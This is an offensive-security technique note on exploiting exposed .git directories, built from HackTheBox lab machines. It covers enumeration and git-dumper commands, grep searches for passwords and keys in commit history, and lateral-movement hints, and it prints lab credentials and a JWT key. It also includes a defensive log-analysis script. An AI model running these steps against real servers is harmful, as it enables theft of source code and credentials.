Git Repository Exposure
# Overview
Exposed .git directories on web servers allow attackers to reconstruct the full source code of a web application, including commit history, configuration files, and hardcoded credentials. This technique is effective against development servers where version control directories were left in the web root, providing complete insight into application logic, authentication mechanisms, and potential secrets committed to the repository over time.
# Prerequisites
- HTTP access to a web server with an exposed `.git` directory
- git-dumper or similar tool
- git CLI for commit history analysis
# Detection & Enumeration
## Identifying Exposed .git
```bash
# Direct access test
curl -s http://target.htb/.git/HEAD
# ref: refs/heads/master -- confirms .git is accessible
# Directory listing test
curl -s http://target.htb/.git/config
# Gobuster scan for .git
gobuster dir -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt \
  -u https://source.cereal.htb -k -t 50
# /uploads (Status: 200)
# /.git (Status: 200) <-- key finding
# Check for .git in subdomains using ffuf
ffuf -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt:FUZZ \
  -u http://target.htb/ -H 'Host: FUZZ.target.htb' -fs <size>
```
## Verifying Accessibility
```bash
# Check if directory listing is enabled
curl -s http://target.htb/.git/ | head -20
# Check individual files
curl -s http://target.htb/.git/config
# [remote "origin"]
# url = https://github.com/internal/private-repo.git
```
# Exploitation / Execution
## Using git-dumper to Reconstruct Repository
```bash
# Clone git-dumper
git clone https://github.com/arthaud/git-dumper
cd git-dumper
pip install -r requirements.txt
# Dump the repository
python git_dumper.py https://source.cereal.htb/ ./src
cd src
# Repository fully reconstructed locally
```
## Commit History Analysis
```bash
# View all commits with full diffs
git log -p
# Search for sensitive keywords in commit diffs
git log -p | grep -iE "password|secret|key|token|credential"
# Intentions HTB: discovered Greg's password Gr3g1sTh3B3stDev3l0per!1998!
# Look at a specific suspicious commit
git show <commit_hash>
# Identify commits that remove secrets (security fixes)
# (asterisks must be escaped; an unescaped "****" in a BRE matches every line)
git log -p --diff-filter=M | grep -iE -B5 -A5 "redacted|\*{4}|REMOVED"
# Cereal HTB: found JWT signing key "secretlhfIH&FY*#oysuflkhskjfhefesf" in removed commit
```
## Source Code Review
```bash
# Find hardcoded keys in source
grep -r "secret\|password\|api_key\|token\|JWT_SECRET" --include="*.js" --include="*.py" .
# Find database credentials in config files
grep -r "mysql\|postgres\|connectionString\|DB_" --include="*.json" --include="*.yml" .
# Identify authentication bypass opportunities
grep -r "Authorize\|Authenticate\|login\|register" --include="*.cs" --include="*.py" .
```
## .git/config Analysis
```bash
# Check for internal repository URLs
cat .git/config
# [remote "origin"]
# url = git@internal.gitlab.local:project/repo.git
# Use discovered URLs for lateral movement
curl -s http://internal.gitlab.local/api/v4/projects
```
## Dealing with Restricted Git Access
```bash
# If git commands fail with "dubious ownership" errors:
git log -p
# fatal: detected dubious ownership in repository at '/var/www/html/app'
# git refuses to read a repo owned by another user; safe.directory whitelists it.
# Point HOME at a writable location when the real home directory cannot hold
# the --global config (Intentions HTB)
HOME=/tmp git config --global --add safe.directory /var/www/html/app
HOME=/tmp git log -p
```
# Common Pitfalls
- git-dumper fails on incomplete .git directories -- try manual file-by-file download
- git log fails with "dubious ownership" -- use HOME= override or git config --global safe.directory
- Commit history may be truncated -- .git may be a deployment snapshot, not full history
- Binary files in commits may not diff cleanly -- look at commit messages for context
# OPSEC Considerations
- Downloading an entire .git repository generates a distinct traffic pattern (many small requests)
- .git/config may contain internal hostnames that reveal infrastructure details
- Commit timestamps expose the development timeline of the target
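The traffic pattern noted above is easy to spot in ordinary web server access logs. The following is an added example, not part of the original notes: it parses constructed combined-format log lines and, per client IP, distinguishes a bare probe (request for `.git/HEAD` answered 404) from confirmed exposure (2xx on a `.git/` path) and from a dump in progress (repeated 2xx fetches of `.git/objects/`). The log lines and thresholds are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed sample access-log lines (Apache/nginx combined format); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [10/May/2024:13:01:02 +0000] "GET /.git/HEAD HTTP/1.1" 200 23 "-" "curl/8.0"
203.0.113.5 - - [10/May/2024:13:01:03 +0000] "GET /.git/config HTTP/1.1" 200 137 "-" "curl/8.0"
203.0.113.5 - - [10/May/2024:13:01:04 +0000] "GET /.git/objects/ab/cdef0123456789abcdef0123456789abcdef0123 HTTP/1.1" 200 412 "-" "python-requests/2.31"
203.0.113.5 - - [10/May/2024:13:01:04 +0000] "GET /.git/objects/12/3456789abcdef0123456789abcdef0123456789ab HTTP/1.1" 200 388 "-" "python-requests/2.31"
203.0.113.5 - - [10/May/2024:13:01:05 +0000] "GET /.git/index HTTP/1.1" 200 2048 "-" "python-requests/2.31"
198.51.100.7 - - [10/May/2024:13:02:10 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [10/May/2024:13:02:11 +0000] "GET /.git/HEAD HTTP/1.1" 404 153 "-" "Mozilla/5.0"
"""

# Combined log format: client, identd, user, [timestamp], "METHOD PATH PROTO", status, ...
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# A ".git" path component (not ".gitignore" or "repo.git"), anywhere in the URL path.
GIT_PATH_RE = re.compile(r'(^|/)\.git(/|$)')


def analyse(log_text):
    """Return {ip: summary} for every client that requested a .git path.
    'probes' counts all such requests, 'served' only those answered 2xx,
    'objects' the 2xx fetches under .git/objects/ (the bulk of a dump)."""
    stats = defaultdict(lambda: {"probes": 0, "served": 0, "objects": 0, "paths": []})
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or not GIT_PATH_RE.search(m["path"]):
            continue
        s = stats[m["ip"]]
        s["probes"] += 1
        s["paths"].append(m["path"])
        if m["status"].startswith("2"):
            s["served"] += 1
            if "/.git/objects/" in m["path"]:
                s["objects"] += 1
    return dict(stats)


def classify(summary, object_threshold=2):
    """Severity label for one client's summary (threshold is a constructed value)."""
    if summary["served"] == 0:
        return "probe-only"          # server denied access; still worth noting the scan
    if summary["objects"] >= object_threshold:
        return "dump-in-progress"    # object files being pulled: assume full source is lost
    return "exposure-confirmed"      # .git is readable; a dump may follow


if __name__ == "__main__":
    for ip, summary in analyse(SAMPLE_LOG).items():
        print(f"{ip}: {classify(summary)} ({summary['served']}/{summary['probes']} served)")
```

Feed real logs in via `analyse(open(path).read())`; a `probe-only` hit still tells you the path is being scanned, while `exposure-confirmed` means the directory must be removed or denied at the web server before the next request.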
# Post-Exploitation Value
- Complete source code for vulnerability identification (auth bypass, SQL queries, hardcoded secrets)
- Hardcoded API keys, JWT signing secrets, encryption keys in commit history
- Database credentials in configuration files (application.properties, .env, web.config)
- Internal infrastructure URLs from .git/config (GitLab, Jenkins, internal APIs)
- Developer credentials that may be reused across services
# Cross-References
## Tool References
| Tool | Link |
|---|---|
| git-dumper | https://github.com/arthaud/git-dumper |
| GitTools | https://github.com/internetwache/GitTools |
| GitHacker | https://github.com/WangYihang/GitHacker |
| truffleHog | https://github.com/trufflesecurity/trufflehog |
## Source Machines
- Intentions (Hard, Linux) -- Git history reveals greg's SSH password
- Cereal (Hard, Windows) -- Git commit leak of JWT signing key, source code review for deserialization
- Editorial (Easy, Linux) -- Git history reveals prod credentials and CVE-2022-24439 exploitation